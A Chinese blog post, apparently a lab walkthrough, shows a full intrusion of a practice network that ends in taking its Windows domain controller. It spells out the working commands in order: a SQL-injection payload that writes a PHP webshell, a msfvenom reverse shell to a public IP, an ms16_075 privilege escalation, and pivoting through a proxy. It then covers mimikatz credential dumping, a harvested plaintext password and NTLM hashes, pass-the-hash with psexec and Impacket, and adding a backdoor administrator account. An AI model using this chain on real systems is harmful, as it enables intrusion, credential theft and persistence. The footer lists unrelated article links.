msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 乐视盒子,电视盒子adb工具手机端

    手机、电视(盒子) 打开ADB调试 一览表 一、手机打开ADB调试方法 序号 名称 描述 方式 1 华为手机 EMUI 1、设置 ->关于手机-> 版本号 点击(4~5次) 2、返回设置 ->开发者选项 ->USB调试 2 小米手机 MIUI11 1、设置 ->我的设备 ->全部参数 -> MIUI版本 点击(4~5…

    2023-07-06
  • 文化部如何推动中国文化发展

    中国小康网讯 记者赵狄娜 摄影宁颖 北京报道 由北京市人民政府、中国人民银行、新华通讯社、中国银行保险监督管理委员会、中国证券监督管理委员会和国家外汇管理局共同主办的2021金融街论坛年会今日在京召开。作为2021金融街论坛年会的重要系列活动之一,由中国文化艺术发展促进会、《小康》杂志社主办,北京金融街服务局作为支持单位的“文化艺术与金融创新”专场活动,今日…

    2023-05-22
  • 淘宝网怎么加好友,在淘宝怎样加好友

    《淘宝网怎么加好友》 在如今的网络时代,淘宝作为一个大型的电商平台,不仅是购物的场所,还可以通过加好友来拓展社交圈子,获取更多的购物信息和优惠。 那么,淘宝网到底怎么加好友呢?下面就让我们一起来探索一下吧。 一、通过淘宝账号加好友 这也许是最常见的一种加好友方式。 当你在淘宝上购物或者浏览商品时,可能会遇到一些你感兴趣的卖家或者买家。 如果你觉得他们的商品或…

    2025-06-29
  • 冰冻墨鱼仔的做法大全(冰冻墨鱼仔的做法大全砂锅)

    海鲜在我们家是最受欢迎的,可惜都太贵了,不能天天顿顿吃,好遗憾哦!等我有钱了,我要一日三餐的买海鲜吃!哈哈哈哈…今天去超市看到墨鱼仔挺新鲜的,就买了一斤回来,做一道香辣墨鱼仔,麻辣鲜香,特别的下饭! By 果妈私房菜 【豆果美食官方认证达人】 用料 墨鱼仔 500克洋葱 半个蒜苔 1把小米辣 10个蒜瓣 1个生姜 1块干辣椒 2个花椒 10粒郫县豆瓣酱 1勺…

    2022-05-15 投稿
  • 揭秘低价卡盟开钻平台的赚钱套路(卡盟平台能赚钱是真的吗)

    简单的给大家介绍一下卡盟平台,这些平台的作用,就是把一些散落的虚拟供货商聚集到一起,那么这样的平台就是卡盟平台,例如充值、游戏脚本、刷数据服务、卡钻服务等等这些有关数字虚拟服务的就叫卡盟平台。 如果你以前用过卡盟这样的平台应该知道里面的服务有很多,其中最具有特色的就是卡游戏装备以及开钻服务,而这些道具和特权如果你直接购买可能需要两三百甚至上千块,而在卡盟平台…

    2022-01-08
  • 重新下载微信怎么恢复聊天记录,重装了微信如何恢复聊天记录

    就在前几天,我的一个朋友突然电话我,他无意中卸载了微信,重新下载安装后所有的聊天记录都不见了! 呃,聊天记录没有就没有了嘛! 可是,这么多年做生意,很多客户的欠款,货款报价等信息都没了… … 损失未知… …天哪! 我知道,微信的聊天信息没有在腾讯的服务器保留,所以,只要在手机端卸载软件后,聊天记录就不能找回来了!   可能有朋友会说网上有各种软件跟…

    2022-03-24
  • 执念太深的情感语录短句

    1、人生就是一个认清自己的过程,认清自己的优点,局限,知道哪些能干,哪些不能干,哪些努力努力就可以得到,哪些累死今生也不会拥有。 2、生活有时候,让我们挫败的,是花力气花心思去经营的事情,做不好,不如愿,往往放下以后,无心插柳的瞬间,反而水到渠成的达到了。 3、有人曾经说过,当你停下来思考你是否爱一个人时,这意味着你不再爱他了。 4、幸福的关键不是找到一个完…

    2023-02-10
  • 宝妈在家干什么挣钱靠谱(宝妈赚钱项目)

    作为一个宝妈没收入,必须通过兼职来搞钱!但是平时得管宝宝,没有时间去做线下兼职,那该怎么办呢? 没关系,可以做网络兼职啊! 这个是我今年最多一个月的兼职收入: 1、码字员 码字员也是我个人比较推荐的,简单不用动脑,就是拿电脑敲敲字就行,唯一要求就是打字够快就行。我一般心烦意乱不想动脑的时候就会做这种兼职,噼里啪啦敲一顿,既得到了发泄又能赚到钱。 2、答题 答…

    2022-01-04
  • dnf史诗药剂在哪买(DNF史诗药剂叫什么)

    DNF地下城与勇士最近出了孤单的小灯笼活动,里面最为吸引勇士们的无非就是小灯笼的小瓶史诗Buff药剂和小灯笼的大瓶史诗Buff药剂,但是勇士们却是叫苦连天,纷纷大叫这是假药,吃了后根本什么都没出。那么勇士有没想过会不会是我们用药的姿势不对呢? 那么这句话的意思就是:药本来是能解毒的,但是你没病还任意滥用药的话,那么就会发生毒副作用,变成真正的毒药。就是说我们…

    2023-01-31
  • 菠萝炒饭禁忌(菠萝炒饭用什么菠萝比较好)

    炒饭虽说是种很随意的食物,很大众化,想吃随时就能拥有,但它有时候也是可以变得很精致的,可以变得一种让人吃不起的感觉,它就如人们对生活的追求,只要认真起来,那也是可以闪闪发光的,所以,一份精致的炒饭也可以让人高攀不起。   说到炒饭,其中最有特色的莫过于菠萝炒饭了。水果中本身就带有甜味,一般人都不会将它和菜肴结合到一起,不过拿菠萝和炒饭相配的话,那口…

    2022-05-10 投稿
  • 12305是空号怎么回事(12305为什么打过去是空号)

    总是听大家说运营干货,好像从来没有人系统讲过快递物流的事情,这么重要的就由小当来讲吧,最知道大家最关心什么,价格和各种快递问题件的处理。 今天就来说说快递那些事,里面有非常多你闻所未闻的爆料,一定对你有帮助。   新手商家如何谈到较低快递价格 1:直接和对方说你是做电商的,库存很大,一定要强调库存很大。 2:所有的问题件破损、延误、我这边都不追究快…

    2022-03-14
  • 意大利红酒好喝的红酒品牌,意大利红酒品牌有哪些牌子

    囊括一切酒类知识,走进微醺酒类世界! 旧世界与新世界葡萄酒的区别之一,就是旧世界不大爱在酒标上写品种。他们的思路也很好懂:世界上几乎所有的经典品种都是从我们这里流传出去的,一个产区一种风格,你看到我们产区的名字就应该知道是什么品种了。   对于初学者来说,的确除了强记没啥别的办法,法国葡萄酒算是很好记也好懂的了,产区之间界限分明,风格迥异。但是对于…

    2022-04-22 投稿